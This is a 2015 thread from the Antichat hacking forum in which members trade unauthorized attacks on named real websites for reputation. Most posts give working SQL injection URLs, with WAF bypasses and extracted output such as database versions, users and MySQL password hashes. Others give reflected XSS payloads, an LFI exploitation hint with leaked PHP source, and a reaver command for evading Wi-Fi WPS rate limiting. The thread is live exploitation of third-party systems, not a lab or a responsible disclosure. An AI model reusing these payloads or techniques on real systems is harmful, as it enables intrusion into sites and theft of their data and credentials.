Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Уязвимости SQLi, XSS и другие. (https://forum.antichat.xyz/showthread.php?t=424991)

Егорыч+++ 10.05.2015 10:12

Эта тема только для публикации уязвимостей найденным вами лично. Любая честно найденная уязвимость прибавляет вам репутации. Тема исключительно для вновь прибывших.

Перед постом проверяйте, не выкладывалась ли уже найденная вами уязвимость. сделать это можно так:

Google:

Код:

Code:
site:antichat.ru ваш_сайт_с_уязвимостью.ру

Не забывайте, что необходимо написать эксплоит с выводом для SQLi, для XSS вывести alert(), для LFI прочитать /etc/passwd и т. п.

Цитата:

Сообщение от BigBear
BigBear said:

Ребят, в целях обучения начинающих пентестеров грамотным определениям - ЖЕЛАТЕЛЬНО (если хотите плюсы) указывать полный тип найденной уязвимости - Blind SQL Injection, Reflected XSS, Arbitrary File Downloading и другие.


BabaDook 10.05.2015 11:30

Два http://www.webbonus.net.ua/bitcoin-s.php?sait=-10'+/*!12345union*/+/*!12345select*/ 1,2,3,4,5,6,7,8,database/*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*/(),10+--+ '-

Кстати , тут WAF и я заюзал технику буфер оверфлов П.С нигде я не нашёл на эту тему статей и очень мало мануалов про обход WAF итд .

BabaDook 10.05.2015 11:37

Три lfi

http://greyslon.ru/index.php

post

action=register

&ajax=true

&data=login%3De%26email%3De%26pass%3De%26repass%3D e%26payeer%3De%26captcha%3De

&page=../info

Ещё это http://greyslon.ru/htaccess Не знаю уязвимость это или нет чтение этого файла

BabaDook 10.05.2015 12:49

bidderland.co.in/siteadmin

Эта уязвимость эксплуатируется за 5 секунд.

нашёл не я , но она очень интересная, не типичная. Кто догнал прошу оставить это в секрете.

WallHack 10.05.2015 20:16

Цитата:

Сообщение от tiger_x
tiger_x said:

Первая SQL
http://www.c2-int.com/news-full.php?id=1278'

А что не раскрутил ?

Код:

Code:
http://www.c2-int.com/news-full.php?id=-1278+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14+--+

Версия: 5.5.43-37.2

User: c2deuts_ice@localhost

-----------------------------

Цитата:

Сообщение от None
Вторая XSS

Зачем делать несколько постов можно в одном все выложить

BigBear 10.05.2015 20:39

Цитата:

Сообщение от tiger_x
tiger_x said:

Просто прямо сейчас ищу )) Как нахожу выкладываю!

Раскручивайте уязвимости. Пытайтесь придумать вектор атаки. Мы вас не для этого отбираем, чтобы вы просто умели что-то искать.

frank 10.05.2015 21:02

Код HTML:

HTML:
http://www.asep7.gov.la/show.php?id=15%27+and+12=16+union+select+1,2,3,4,version%28%29,6,7,8,9,10,11,12+--+

5.5.40-0ubuntu0.12.04.1 - вывод в заголовке

Код HTML:

HTML:
http://www.minddesign.co.uk/show.php?id=483%27+and+34=-2+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16+--+

5.6.23

Код HTML:

HTML:
http://www.psych-it.com.au/Psychlopedia/article.asp?id=277+AND+568=-3+union+select+1,concat%28username,0x3a,pass%29,3,4,5,6+from+users+limit+10,1+--+

4.1.18-nt

frank 10.05.2015 23:25

Код HTML:

HTML:
http://www.damico.co.za/staff_profile.asp?STAFF_ID=3+and+12=0+union+select+1,user%28%29,database%28%29,version%28%29,5+--+

idserver_damico@winwebs03.cpt.wa.co.za

idserver_damicodb

5.5.42-cll

Mister_Bert0ni 11.05.2015 00:51

http://goo.gl/imjzsb

http://goo.gl/8IKVeV

http://goo.gl/wYRBLz

http://emofans.ru/gallery/emowallp/

POST_DATA:

foto_msort=&foto_sort=null and ++POLYGON((select*from(select*from(select+concat(0 x7e7e496e6a6563746564204279204d69737465725f4265727 4306e697e7e,0x203a3a204461746162617365203a3a ,database(),0x202056657273696f6e203a3a20,version() )e)f)x)) -- -


https://www.choosewellness.com.ph/ca...entry.php?id=5 and(select!x-~0.+from(select(select+group_concat(0x3c7370616e20 7374796c653d22666f6e742d66616d696c793a4963656c616e 643b636f6c6f723a7265643b73697a653a353b746578742d73 6861646f773a23303030203070782030707820337078223e4d 69737465725f42657274306e693c62723e,0x4461746162617 365203a3a202020,DATABASE(),0x3c62723e506f727420203 a3a2020,@@PORT,0x3c62723e46696c6573797374656d203a3 a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,@@VERSIO N_COMPILE_MACHINE,0x3c62723e56657273696f6e206f6620 4461746162617365203a3a2020,version(),0xa3c62723e48 6f73746e616d65203a3a20,@@HOSTNAME,0x3c2f7370616e3e ))x)x)

Mister_Bert0ni 11.05.2015 00:55

Демонстрация SQLi от меня

Mister_Bert0ni 11.05.2015 00:56

Демонстрация SQLi от меня

Mister_Bert0ni 11.05.2015 01:00

SQLi на сайте bitbank

Mister_Bert0ni 11.05.2015 01:01

Цитата:

Сообщение от BabaDook
BabaDook said:

bidderland.co.in/siteadmi
n
Эта уязвимость эксплуатируется за 5 секунд.
нашёл не я , но она очень интересная, не типичная. Кто догнал прошу оставить это в секрете.

Да да 5 сек даже много)))

rezistor 11.05.2015 08:49

Внесу и я свои первые 5 копеек

http://www.leong-leong.com/press.ph...,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29 --

Arboretum 11.05.2015 09:15

http://java.lordy.ru/

Есть жаба игра, зарегавшись, в чате можно написать ">alert(XSS)", после этого на java.lordy.ru высветится XSS.

frank 11.05.2015 16:24

Код HTML:

HTML:
http://www.jhewlett.com/content/humor.php?id=10%27+and+1=-0+union+select+user%28%29,group_concat%28database%28%29,0x3a,version%28%29%29+--+

jhewlett_r@209.68.5.201

jhewlett_prod:5.0.96-log

Код HTML:

HTML:
http://nightgallery.ca/event.php?id=91+or+1+group%20by%20concat_ws%280x2a,version%28%29,user%28%29,database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+

5.0.96-log

nightgallery20@72.167.232.44

nightgallery20

Код HTML:

HTML:
http://www.australianpaddlesurfer.com.au/review.php?id=113+or+2+group%20by%20concat_ws%280x2f,version%28%29,user%28%29,database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+

10.0.17-MariaDB-cll-lve

austral3_casso@server-2h-r34.ipv4.au.syr

Код HTML:

HTML:
http://www.novagora.net/rub.php?Rub=0&IDR=5+and+2=0+union+select+1,2,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,4,5+--+

4.0.26-standard-log

novagoraTest

novagoraTest@10.0.5.18

Zen1T21 11.05.2015 16:53

Цитата:

Сообщение от BabaDook
BabaDook said:

http://www.girlplays.ru/view_search.php
уязвимость в поисковике, пока что не крутил.
пост данные
search=&submit_s=

search=') union select 1,concat(User,Password),3,4,5,6,7 from mysql.user#&submit_s=

root*B7C246CBBD3D468E80CB40AD57BA8BAFFEEB62BC
debian-sys-maint*E639A7C638862F6392314324D1E7537900655649

adelina*21A61A920952BE6489C905AA3836F552D4A1C631

tiger_x 11.05.2015 19:44

Код HTML:

HTML:
http://www.oar.org.ro/press.php?id=-1%20union%20all%20select%20null,null,null,version%28%29,null,null%20--

Версия: 5.6.23

User: oarorgro_oar@localhost

rezistor 11.05.2015 19:54

XSS

http://gov.cap.ru/?__VIEWSTATE=/wEPDwUKLTczMDc3ODY5Nw9kFgJmD2QWAgIDD2QWEgIBD2QWAgI BD2QWAgIBDxYCHgRUZXh0BXLQp9GD0LLQsNGI0YHQutCw0Y8g0 YDQtdGB0L/Rg9Cx0LvQuNC60LAgPGRpdj7QntGE0LjRhtC40LDQu9GM0L3Ri 9C5INC/0L7RgNGC0LDQuyDQvtGA0LPQsNC90L7QsiDQstC70LDRgdGC0L g8L2Rpdj5kAgMPZBYOAgEPDxYCHgdWaXNpYmxlaGRkAgMPDxYC HwFoZBYCZg8PFgIeC05hdmlnYXRlVXJsBTpodHRwOi8vZ292Lm NhcC5ydS9Pcmdhbml6YXRpb24uYXNweD9nb3ZfaWQ9NDkmdW5p dD1jb250YWN0ZGQCBQ8PFgIfAWhkFgJmDw8WAh8CBSpodHRwOi 8vZ292LmNhcC5ydS9TdHJ1Y3R1cmUuYXNweD9nb3ZfaWQ9NDlk ZAIJDw8WAh8BZ2QWAmYPFgIeBGhyZWYFMmh0dHA6Ly9nb3YuY2 FwLnJ1L1NpdGVNYXAuYXNweD9pZD0zNjU0NzcmZ292X2lkPTQ5 ZAILDw8WAh8CBShodHRwOi8vZ292LmNhcC5ydS9TaXRlTWFwLm FzcHg/Z292X2lkPTQ5ZGQCDQ8PFgIfAgUtaHR0cDovL2dvdi5jYXAucn Uvc3BlYy9EZWZhdWx0LmFzcHg/Z292X2lkPTQ5ZGQCDw8PFgIfAgUmaHR0cDovL2dvdi5jYXAucn UvcnNzLz9nb3ZfaWQ9NDkmaWQ9NDlkZAIHD2QWBgIDDw8WAh8B Z2RkAgUPDxYCHwFnZGQCFQ8PFgIfAWdkZAINDw8WAh8BZ2RkAh EPDxYCHwFoZGQCEw9kFhoCAQ9kFgICAQ8PFgIfAgUcaW5mby5h c3B4P2dvdl9pZD00OSZ0eXBlPXRvcGRkAgMPZBYCAgEPDxYCHw IFHWluZm8uYXNweD9nb3ZfaWQ9NDkmdHlwZT1tYWluZGQCBQ9k FgICAQ8PFgIfAgUdaW5mby5hc3B4P2dvdl9pZD00OSZ0eXBlPW 5ld3NkZAIHDw8WAh8BaGRkAgkPZBYCAgEPDxYCHwIFFHZpZGVv LmFzcHg/Z292X2lkPTQ5ZGQCCw8PFgIfAWhkZAINDw8WAh8BaGQWAgIBDw 8WAh8CBRdjYWxlbmRhci5hc3B4P2dvdl9pZD00OWRkAg8PZBYC AgEPDxYCHwIFGlB1YmxpY2F0aW9uLmFzcHg/Z292X2lkPTQ5ZGQCEQ9kFgICAQ8PFgIfAgUYTWVtb3JpYWxzLm FzcHg/Z292X2lkPTQ5ZGQCEw8PFgIfAWhkZAIVD2QWAgIBDw8WAh8CBR NsYXdzLmFzcHg/Z292X2lkPTQ5ZGQCFw8PFgIfAWhkZAIZDw8WAh8BaGRkAhUPDx YCHwFoZGQCFw8PFgIfAWdkZAIbD2QWAgIBDw8WAh8CBSZPcmdz LmFzcHg/Z292X2lkPTQ5JmlkPTQ5JnVuaXQ9Y29udGFjdGRkZP3Mf6N7AL xvhcyia+88BzPuA4FLR9eN77dXGFDCRBD/&ctl00$Search1$BtnSearch=&__VIEWSTATEGENERATOR=CA0 B0334&ctl00$Search1$TextSearch=античатalert ()&__EVENTVALIDATION=/wEWBwK1y/X1DALNk6LCAwKbnsfFCAK8lLmCCQLC9M+dCwKC1JS2BwKjz9/DAXkyh+c6G8rMsfjzrV2Wjy6zi7nnNfiqJHMfqPO+S6mI&ctl0 0$Comments=античат&ctl00$ErrorText=

Mister_Bert0ni 12.05.2015 00:54

http://goo.gl/uMgvlO

Код:

Code:
http://www.perio.com.ua/articles.php?id=.13 and @b:=current_user()+/*!50000UNIoN+Select*/+1,concat/*_*/(0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,0x4461746162617365203a3a202020,DATABASE/**_**/(),0x3c62723e506f727420203a3a2020,@@port,0x3c62723e43757272656e745f55736572203a3a202020203a3a  ,@b,0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,VERSION(),0xa3c62723e486f73746e616d65203a3a20,0x3c2f7370616e3e,@@HOSTNAME),3,1337,5,6 -- -

Может кто знает как здесь WAF на information_schema обойти?

Mister_Bert0ni 12.05.2015 14:29

Цитата:

Сообщение от Егорыч+++
Егорыч+++ said:

Да и в ближайщее время тут всякие конкурсы, на которых будет возможность проявить себя.

Для этого будет создан отдельный раздел?Где они будут постится?

BabaDook 12.05.2015 14:33

Цитата:

Сообщение от Mister_Bert0ni
Mister_Bert0ni said:

Для этого будет создан отдельный раздел?Где они будут постится?

Да, тут есть конкурс на безопасность ОС, итд Это + к репе

Я стану первым кто сделает это

И так мой исследование и авторство

Надеюсь маленькие глупенькие не увидят

И так расскажу как можно обойти

WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking при взломе wi-fi

Всё очень просто

-T, --m57-timeout=

-d, --delay=

-t, --timeout=

команда примет такой вид

reaver -i mon0 -b 00;11;11;11;11;11 -c 12 -vv -m57-timeout=20 --delay=20 --timeout=20

советую в комплексе использовать очень важная команда --delay. Остальные для успокоение души.

п.с советую начать не с 20, а с 50 или 100

читайте мануалы к программам, вот что я вам скажу

Mister_Bert0ni 12.05.2015 15:16

Цитата:

Сообщение от BabaDook
BabaDook said:

Да, тут есть конкурс на безопасность ОС, итд Это + к репе
Я стану первым кто сделает это
И так мой исследование и авторство
Надеюсь маленькие глупенькие не увидят
И так расскажу как можно обойти
WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking при взломе wi-fi
Всё очень просто
-T, --m57-timeout=
-d, --delay=
-t, --timeout=
команда примет такой вид
reaver -i mon0 -b 00;11;11;11;11;11 -c 12 -vv -m57-timeout=20 --delay=20 --timeout=20
советую в комплексе использовать очень важная команда --delay. Остальные для успокоение души.
п.с советую начать не с 20, а с 50 или 100
читайте мануалы к программам, вот что я вам скажу

Не на всех роутерах delay помогает))) TP-Link-и часто в лок уходят после 10 неправильных попыток ввода пина с одного мак-адреса и delay там все равно)

tiger_x 12.05.2015 20:25

Код HTML:

HTML:
http://www.towcar.info/read.php?id=-1%20union%20all%20select%20null,null,null,concat%28version%28%29,0x4c7,user%28%29%29,null,null,null,null,null,null--

Версия:4.1.21-standard

User:ctrekker@localhost

Егорыч+++ 12.05.2015 20:39

Цитата:

Сообщение от tiger_x
tiger_x said:

Код HTML:

HTML:
http://www.towcar.info/read.php?id=-1%20union%20all%20select%20null,null,null,concat%28version%28%29,0x4c7,user%28%29%29,null,null,null,null,null,null--

Версия:4.1.21-standard
User:ctrekker@localhost

Это какой то сверх дырявый сайт и причем очень давно.

tiger_x 12.05.2015 20:44

Цитата:

Сообщение от Егорыч+++
Егорыч+++ said:

Это какой то сверх дырявый сайт и причем очень давно.

А этот пойдет?

Код HTML:

HTML:
http://www.sourceisrael.com/read.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT%28version%28%29,0x4c7,user%28%29%29,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--


BabaDook 13.05.2015 02:53

PHP код:

PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//m.deffki.su/?go=[/COLOR][/COLOR] 

по моему lfi но я не могу раскрутить, если кто подскажет буду признателен

YaBtr 13.05.2015 10:17

Цитата:

Сообщение от BabaDook
BabaDook said:

PHP код:

PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//m.deffki.su/?go=[/COLOR][/COLOR] 

по моему lfi но я не могу раскрутить, если кто подскажет буду признателен

Набранное количество баллов позволяет Вам задавать вопросы по уязвимостям в профильном разделе форума.

По поводу вопроса - небольшая подсказка:

http://m.deffki.su/?go=php://filter/...resource=index

PHP код:

PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]dir[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$root_path[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/templates/'[/COLOR][COLOR="#007700"];
[/
COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]load_template[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'main.tpl'[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]$go[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]go[/COLOR][COLOR="#007700"]];

if ([/COLOR][COLOR="#0000BB"]$go[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"prv"[/COLOR][COLOR="#007700"])
{
[/
COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location:[/COLOR][COLOR="#0000BB"]$site_url[/COLOR][COLOR="#DD0000"]/prv.php?id=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);
}

elseif (!empty([/COLOR][COLOR="#0000BB"]$go[/COLOR][COLOR="#007700"]))
{
include[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$go[/COLOR][COLOR="#DD0000"].php
"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$indek_1[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$indek[/COLOR][COLOR="#007700"];
}

else
{
include[/COLOR][COLOR="#DD0000"]"main.php"[/COLOR][COLOR="#007700"];
}
if
(empty([/COLOR][COLOR="#0000BB"]$descr[/COLOR][COLOR="#007700"]))
{
[/
COLOR][COLOR="#0000BB"]$descr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Ýðîòèêà - ýòî òàëàíò êðàñèâî ñ ñåêñóàëüíî ïîêàçàòü æåíñêîå òåëî. Ñ äðóãîé ñòîðîíû, ëþáûå ÷àñòíûå ýðî ôîòî òàê æå ìîæíî íàçâàòü ýðîòèêîé. Îáû÷íûå ãîëûå äåâóøêè íà äîìàøíèõ ôîòîãðàôèÿõ ýòî ïðîñòî ýðîòèêà, à êðàñèâî ïîêàçàííûå ãîëûå äåâî÷êè ýòî óæå êðàñèâàÿ, ïðîôåññèîíàëüíàÿ ýðîòèêà. Íà íàøåì ñàéòå âû åæåäíåâíî ìîæåòå íàáëþäàòü è òî è äðóãîå (áåñïëàòíî) - ëþáèòåëüñêèå ôîòî ãîëûõ áàá è ïðîôåññèîíàëüíûå ôîòîãðàôèè ãîëûõ òåëîê ìîäåëåé. Çàõîäèòå ÊÀÆÄÛÉ ÄÅÍÜ è íàñëàæäàéòåñü ñåêñóàëüíûìè ôîòî ãîëûõ æåíùèí îíëàéí!"[/COLOR][COLOR="#007700"];
}
else
{
[/
COLOR][COLOR="#0000BB"]$descr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$descr[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
}
[/
COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'{main}'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'{title}'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'{indek}'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$indek[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'{indek_1}'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$indek_1[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'{descr}'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$descr[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]compile[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'main'[/COLOR][COLOR="#007700"]);
echo[/
COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]result[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'main'[/COLOR][COLOR="#007700"]];
[/
COLOR][COLOR="#0000BB"]?>
[/COLOR][/COLOR] 


tiger_x 13.05.2015 18:31

Код HTML:

HTML:
http://www.coon-coon.com/ViewPhoto.php?Id=9%27%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x56657273696F6E3A3A,version%28%29,0x557365723A3A0D0A,user%28%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.character_sets%20group%20by%20x%29a%29--%27

Version::5.5.40-0ubuntu0.12.04.1

User:: c31cooncooncom@localhost

Егорыч+++ 13.05.2015 21:17

Цитата:

Сообщение от BabaDook
BabaDook said:

очень простая sql
PHP код:

PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.radiotec.ru/catalog.php?cat=jr1&art=-11329+union+select 1.2,3,user(),database(),6,version(),8,9,10,11,12,13,14,15,16,17,18,19+--+ -[/COLOR][/COLOR] 


/threads/21336/page-663#post-2395458

/threads/21336/page-607#post-2158662

tiger_x 13.05.2015 21:23

Код HTML:

HTML:
http://www.sporte-leisure.com.au/info.php?id=-1%27%20union%20all%20select%20null,concat%280x74696765725F783C62723E3C62723E,0x56657273696F6E3A3A20,version%28%29,0x3C62723E557365723A3A20,user%28%29%29,null,null,null,null--%27

Version:: 5.1.48-community

User:: root@localhost

faza02 14.05.2015 01:44

перед постом проверяйте, не выкладывалась ли уже найденная вами уязвимость. сделать это можно так:

Google: site:antichat.ru вашсайтсуязвимостью.ру

Rebz 14.05.2015 18:49

Господа, требуется написать некий пример, эксплоит с выводом.. а не поле = VULNERABLE и ковычка у параметра.

MaxFast 14.05.2015 19:11

Цитата:

Сообщение от Filipp
Filipp said:

1) SQL-inj
http://amphora.ru/books.php?pageit=
VULNERABLE

Код:

Code:
http://amphora.ru/books.php?pageit=10+procedure+analyse+(extractvalue(1,concat(0x3a,version())),1)--

XPATH syntax error: ':5.5.35-1+wheezy1+mh1-log'

tiger_x 14.05.2015 19:25

Код HTML:

HTML:
http://www.pidsphil.org/journal.php?id=40%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT%280x74696765725F783C62723E3C62723E,0x56657273696F6E3A3A20,version%28%29,0x3C62723E557365723A3A20,user%28%29%29,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

Version:: 5.5.32-log

User:: pidsphil_user1@10.20.112.231

BabaDook 14.05.2015 21:52

Не очень я люблю xss

Код HTML:

HTML:
http://tab.dp.ua/catalog.php?sword=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%32%33%29%3b%3c%2f%73%63%72%69%70%74%3e

Ну так же ради юмора

Код HTML:

HTML:
http://tab.dp.ua/catalog.php?sword=%3c%68%31%3e%48%45%4c%4c%4f%3c%2f%68%31%3e

нашёл случайно в попытках вставить php код.

Там ещё sql есть

Mister_Bert0ni 15.05.2015 00:19

Цитата:

Сообщение от None

[HTML]
HTML:
...
...
,,subscribers,is_active,,temp_keys,session_id,,tem p_keys,code,,temp_keys,date,,users,id,,users,user_ pass,,users,email,,users,name,,users,company,,user s,activity,,users,position,,users,phone,,users,reg time,,users,last_visit_time,,users,last_ip,,users, code,,users,is_blocked,,users,is_active,,users,sub scribe,,users_sessions,session_id,,users_sessions, unid,,users_sessions,created_time,,year,id">

tiger_x 15.05.2015 11:20

Код HTML:

HTML:
http://www.muziekhuis.nl/details.php?id=-1%20union%20all%20select%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat%280x3C62723E54494745525F583C62723E,0x56657273696F6E3A3A20,version%28%29,0x3C62723E557365723A3A20,user%28%29%29,NULL,NULL,NULL,NULL,NULL

Version:: 5.5.43-0+deb7u1

User:: muzhuis_qbusa@194.109.22.94

Mister_Bert0ni 16.05.2015 01:46

http://s7.hostingkartinok.com/upload...34529f4ab7.png

Шниперсон 16.05.2015 12:36

Мои 5 копеек

http://www.podarochek .by/about?curCategory=10&curItem=-666+union+select+1,3,user%28%29,5,6,7,8,9,10


Время: 12:12